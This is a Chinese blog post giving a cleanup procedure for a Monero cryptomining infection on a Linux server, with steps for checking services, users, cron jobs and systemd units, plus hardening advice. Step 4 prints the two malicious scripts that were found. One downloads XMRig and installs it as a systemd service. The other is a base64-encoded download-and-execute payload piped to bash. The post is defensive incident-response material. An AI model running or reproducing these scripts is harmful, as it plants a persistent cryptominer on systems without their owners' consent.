首页 > 其他分享 >挖矿病毒处理流程(门罗币)

挖矿病毒处理流程(门罗币)

时间:2024-09-20 20:13:47浏览次数:1  
标签:service 检查 流程 门罗 etc systemctl monero 挖矿

1.检查自启动项

执行systemctl list-unit-files --type=service | grep enabled命令列出全部自启动项,有异常启动项执行systemctl disable A_li_yun_Duns.service删除。A_li_yun_Duns.service为自启动项名称。

2.检查系统用户

执行vi /etc/passwd检查系统用户,如有异常用户将其禁用,执行passwd -l 用户名

3.检查定时任务

执行crontab -e查看定时任务有无默认任务添加进来。若有将其注释掉或删掉。将其执行的脚本文件一起删除。

4.检查根目录有无异常文件

本次根目录下异常文件为wawa.sh、update_udp.sh,以下为wawa.sh脚本内容

#!/bin/bash
cd /root;wget http://zhongcheng-app.oss-cn-beijing.aliyuncs.com/image/image/xmrig-6.21.1-linux-static-x64.tar.gz;tar -zxvf xmrig-6.21.1-linux-static-x64.tar.gz;systemctl stop monero.service;rm -rf /etc/systemd/system/monero.service;wget http://zcapp.oss-cn-beijing.aliyuncs.com/icon/monero.service;sysctl -w vm.nr_hugepages=$((1168+$(nproc)));mv monero.service /etc/systemd/system/monero.service;systemctl daemon-reload;systemctl enable monero.service;systemctl start monero.service

以下为update_udp.sh脚本内容,命令做了base64加密,需要base64解密

#!/bin/bash
echo "IyEvYmluL2Jhc2gKY3VybCAtcyBodHRwOi8vYnBnLXRlc3Qub3NzLWNuLWNoZW5nZHUuYWxpeXVuY3MuY29tL3NDaGFuZ2UvMjAyNC8wMi8yNy9saWJodi5zbyAtbyAvb3B0L2xpYmh2LnNvO2NwIC9vcHQvbGliaHYuc28gL3Vzci9saWIvbGliaHYuc287Y3AgL29wdC9saWJodi5zbyAvdXNyL2xpYjY0L2xpYmh2LnNvO2N1cmwgLXMgaHR0cDovL2JwZy10ZXN0Lm9zcy1jbi1jaGVuZ2R1LmFsaXl1bmNzLmNvbS9zQ2hhbmdlLzIwMjQvMDIvMjcvc3lzZXRtZCAtbyAvb3B0L3N5c2V0bWQ7Y2htb2QgNzc3IC9vcHQvc3lzZXRtZDtjdXJsIC1zIGh0dHA6Ly9icGctdGVzdC5vc3MtY24tY2hlbmdkdS5hbGl5dW5jcy5jb20vc0NoYW5nZS8yMDI0LzAyLzI3L3N5c2V0bWQuc2VydmljZSAtbyAvZXRjL3N5c3RlbWQvc3lzdGVtL3N5c2V0bWQuc2VydmljZTtzeXN0ZW1jdGwgZGFlbW9uLXJlbG9hZDtzeXN0ZW1jdGwgZW5hYmxlIHN5c2V0bWQuc2VydmljZTtzeXN0ZW1jdGwgc3RhcnQgc3lzZXRtZC5zZXJ2aWNlOw=="|base64 -di|bash -s

解读脚本内容,将涉及到的文件清除

5.检查/root目录下有无陌生目录

发现xmrig目录清除

6.检查systemctl服务

执行cd /etc/systemd/system,检查该目录下有无异常服务文件,本次异常文件为A_li_yun_Duns.service,伪装成了阿里云安全服务。

 

处理策略

1.尽量较少对公网开放的端口,尤其是mq的。

2.关闭全部安全组出方向端口,用到哪个开启哪个。挖矿程序需要请求网络领取任务,这样挖矿程序就没任务可执行。

标签:service,检查,流程,门罗,etc,systemctl,monero,挖矿
From: https://www.cnblogs.com/xuqiang7/p/18423202

相关文章

  • Spring的启动流程
    Spring容器的启动流程是一个复杂的过程,涉及多个阶段和组件的协作。核心是ApplicationContext(如ClassPathXmlApplicationContext、AnnotationConfigApplicationContext等)接口的启动。通过对Spring启动流程的详细分析,可以更好地理解Spring是如何加载、解析、实例化、初始化并管理Bea......
  • oracle常用后台进程及sql语句执行流程
    1.checkpoint功能:减少崩溃恢复crashrecovery时间。检查点可以确保在某个时间点之前的所有事务都写入磁盘,保证数据一致性后台进程ckpt触发,ckpt通知dbwr进程将脏数据库dirtybuffer写出到数据文件上.更新数据文件头及控制文件上的检查点触发条件:数据库一致性关闭、altersystem......
  • SMT丨工艺特点及详细生产工艺流程
    SMT丨工艺特点及详细生产工艺流程表面组装技术SMT现状SMT是目前电子组装行业里最流行的一种技术和工艺。自70年代初推向市场以来,SMT已逐渐替代传统"人工插件"的波峰焊组装方式,已成为现代电子组装产业的主流,人们称为电子组装技术的第二次革命。在国际上,这种组装技术已经形成了世......
  • 不剪辑,一天四 为数!手机操作全流程教程详细指南!
    悟空拉新的最新玩法~提供了保姆级教程,非常简单,操作起来又不费时间,详细见完整教程~!参与者无需创作作品,也无需进行复杂操作,只要拥有某音账号且具备打字能力即可。在流量方面无需过度担忧,只需在某音平台上找到其他博主发布的电影、电视剧或动漫视频,在其下方进行评论就行~!......
  • 不剪辑,一天四 为数!手机操作全流程教程详细指南!
    悟空拉新的最新玩法~提供了保姆级教程,非常简单,操作起来又不费时间,详细见完整教程~!参与者无需创作作品,也无需进行复杂操作,只要拥有某音账号且具备打字能力即可。在流量方面无需过度担忧,只需在某音平台上找到其他博主发布的电影、电视剧或动漫视频,在其下方进行评论就行~!......
  • 不剪辑,一天四 为数!手机操作全流程教程详细指南!
    悟空拉新的最新玩法~提供了保姆级教程,非常简单,操作起来又不费时间,详细见完整教程~!参与者无需创作作品,也无需进行复杂操作,只要拥有某音账号且具备打字能力即可。在流量方面无需过度担忧,只需在某音平台上找到其他博主发布的电影、电视剧或动漫视频,在其下方进行评论就行~!......
  • 不剪辑,一天四 为数!手机操作全流程教程详细指南!
    悟空拉新的最新玩法~提供了保姆级教程,非常简单,操作起来又不费时间,详细见完整教程~!参与者无需创作作品,也无需进行复杂操作,只要拥有某音账号且具备打字能力即可。在流量方面无需过度担忧,只需在某音平台上找到其他博主发布的电影、电视剧或动漫视频,在其下方进行评论就行~!......
  • 离散制造 vs 流程制造:锚定精准制造未来,从装配线到化学反应,实时数据集成在制造业案例中
    使用TapData,化繁为简,摆脱手动搭建、维护数据管道的诸多烦扰,轻量替代OGG,Kettle等同步工具,以及基于Kafka的ETL解决方案,「CDC+流处理+数据集成」组合拳,加速仓内数据流转,帮助企业将真正具有业务价值的数据作用到实处,将“实时数仓”方法论落进现实。TapData持续迭代产品......
  • SaaS架构:流程架构分析
    大家好,我是汤师爷~今天聊聊SaaS架构中的流程架构分析。业务流程的概念业务流程是企业为实现目标而制定的一套系统化的工作方法。它由一系列有序的业务活动组成,按照既定规则将资源(输入)转化为有价值的结果(输出)。这一过程需结合企业的具体情况和可用资源,旨在为客户创造价值,同时达......
  • 多模态项目实战班,快速实践多模态项目流程输出相应项目的能力
    科技飞速发展的时代,多模态项目已经成为人工智能和机器学习领域的热门话题。这些项目融合了视觉、听觉、语言等多种信息源,以实现更深层次的理解和交互。本篇文章将深入探讨一个为期3000字的多模态项目实战班,帮助你快速掌握项目流程,并具备输出相应项目的能力。一、引言多模......